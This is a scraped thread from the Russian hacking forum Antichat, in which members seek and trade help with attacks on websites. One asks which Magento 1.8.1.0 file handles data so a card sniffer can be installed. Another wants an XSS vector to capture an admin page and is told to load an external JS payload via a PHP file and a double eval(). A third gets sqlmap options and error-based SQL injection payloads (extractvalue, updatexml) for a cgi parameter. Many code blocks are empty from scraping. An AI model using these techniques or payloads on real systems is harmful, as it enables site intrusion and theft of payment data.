HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2
НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ
loading...
Скрыть
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #1  
Старый 04.02.2018, 16:44
Muracha
Участник форума
Регистрация: 30.07.2011
Сообщений: 151
Провел на форуме:
54593

Репутация: 0
По умолчанию

Цитата:
Сообщение от xaphan  

Вряд ли там будут какие-то данные в открытом виде. Это ж система контроля версий (как и гит). Можно попытаться получить все файлы с исходными кодами, вот посоветую
этот
скрипт.
спасибо! помогло!

А есть ли подобная вещь для WYSIWYG? заточенная на поиск загрузку файлов и тд

dirb использую, dirbuster тоже но интересует более узкоспециализированное
 
Ответить с цитированием

  #2  
Старый 04.02.2018, 17:48
DezMond™
Участник форума
Регистрация: 10.01.2008
Сообщений: 199
Провел на форуме:
961428

Репутация: 662
По умолчанию

Magento Version 1.8.1.0

Кто нить устанавливал снифер на эту версию? нужна помощь, в каком файле данные обрабатываются?
 
Ответить с цитированием

  #3  
Старый 05.02.2018, 20:26
Octavian
Постоянный
Регистрация: 08.07.2015
Сообщений: 501
Провел на форуме:
97114

Репутация: 24


По умолчанию

Есть такои XSS вектор

Код:

Хочу сделать скриншот странице админа, нашел все необходимое, но скрипта очень много и засунуть в name="" получится но и за непонятнои фильтрации он никак не заработает, вариант такои засунуть в name="" что то типа инклуда и заинклудить весь .js, какие варианты инклуда есть типо

Код:

ЕСТЬ В JS ИНКЛУД ЧЕРЕЗ JS?
 
Ответить с цитированием

  #4  
Старый 06.02.2018, 12:40
dmax0fw
Участник форума
Регистрация: 31.12.2017
Сообщений: 107
Провел на форуме:
20361

Репутация: 46
По умолчанию

Цитата:
Сообщение от Octavian  

Есть такои XSS вектор
Код:

Хочу сделать скриншот странице админа, нашел все необходимое, но скрипта очень много и засунуть в name="" получится но и за непонятнои фильтрации он никак не заработает, вариант такои засунуть в name="" что то типа инклуда и заинклудить весь .js, какие варианты инклуда есть типо
Код:

ЕСТЬ В JS ИНКЛУД ЧЕРЕЗ JS?
Код HTML:

нужно учитывать, что для кроссдоменных запросов от сервера должен приходить заголовок Access-Control-Allow-Origin, поэтому мы делаем запрос не прямиком к js файлу а к php, который отправляет нужный нам заголовок и содержимое js пейлоада

содержимое самого php:

PHP код:
[COLOR="#000000"][COLOR="#0000BB"][/COLOR][COLOR="#007700"][/COLOR][/COLOR
 
Ответить с цитированием

  #5  
Старый 06.02.2018, 14:19
Octavian
Постоянный
Регистрация: 08.07.2015
Сообщений: 501
Провел на форуме:
97114

Репутация: 24


По умолчанию

Цитата:
Сообщение от dmax0fw  

Код HTML:

нужно учитывать, что для кроссдоменных запросов от сервера должен приходить заголовок Access-Control-Allow-Origin, поэтому мы делаем запрос не прямиком к js файлу а к php, который отправляет нужный нам заголовок и содержимое js пейлоада
содержимое самого php:
PHP код:
[COLOR="#000000"][COLOR="#0000BB"][/COLOR][COLOR="#007700"][/COLOR][/COLOR
Не хочет

Код:

s.php

Код:

http://host/images/s/s.php

Код:
alert("1");
 
Ответить с цитированием

  #6  
Старый 06.02.2018, 14:28
dmax0fw
Участник форума
Регистрация: 31.12.2017
Сообщений: 107
Провел на форуме:
20361

Репутация: 46
По умолчанию

Цитата:
Сообщение от Octavian  

Не хочет
Код HTML:

нужно дважды евалить

Код HTML:

первый eval() выполняет код из name, то есть получает твой payload, а второй eval() уже выполняет данный payload
 
Ответить с цитированием

  #7  
Старый 09.02.2018, 09:42
Sensoft
Постоянный
Регистрация: 14.06.2015
Сообщений: 396
Провел на форуме:
104689

Репутация: 1
По умолчанию

Вопрос по SQL injection

Код:
GET /getaddr.cgi?heataccount=%5c
.SpoilerTarget" type="button">Spoiler: скриншот


Код:
-u https://site.com/getaddr.cgi?heataccount=1%5c --dbs --no-cast --random-agent --dbms=mysql -v5 --level 2 --risk 3
Код:
-u https://site.com/getaddr.cgi?heataccount=%5c -p heataccount --dbs --no-cast --random-agent --level 2 --risk 3
Не катит он тупа не видит

Как раскрутить кто знает ?
 
Ответить с цитированием

  #8  
Старый 09.02.2018, 10:48
erwerr2321
Флудер
Регистрация: 19.06.2015
Сообщений: 4,126
Провел на форуме:
759330

Репутация: 147


По умолчанию

Цитата:
Сообщение от Sensoft  

Как раскрутить кто знает ?
Руками может?
 
Ответить с цитированием

  #9  
Старый 09.02.2018, 15:00
karkajoi
Постоянный
Регистрация: 26.10.2016
Сообщений: 438
Провел на форуме:
96779

Репутация: 5
По умолчанию

Цитата:
Сообщение от Sensoft  

Вопрос по SQL injection
Код:
GET /getaddr.cgi?heataccount=%5c
Spoiler: скриншот

Код:
-u https://site.com/getaddr.cgi?heataccount=1%5c --dbs --no-cast --random-agent --dbms=mysql -v5 --level 2 --risk 3
Код:
-u https://site.com/getaddr.cgi?heataccount=%5c -p heataccount --dbs --no-cast --random-agent --level 2 --risk 3
Не катит он тупа не видит
Как раскрутить кто знает ?
level=5 попробуй в мапе, ну и руками error based вектор пробуй.

Код:
/getaddr.cgi?heataccount=1" and extractvalue(0x0a,concat(0x0a,(database()))--
/getaddr.cgi?heataccount=1" and updatexml(NULL,concat(0x3a,(database())),Null)--
 
Ответить с цитированием

  #10  
Старый 12.02.2018, 14:21
BabaDook
Познавший АНТИЧАТ
Регистрация: 09.05.2015
Сообщений: 1,066
Провел на форуме:
238786

Репутация: 40


По умолчанию

100500 waf
 
Ответить с цитированием
Ответ





Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.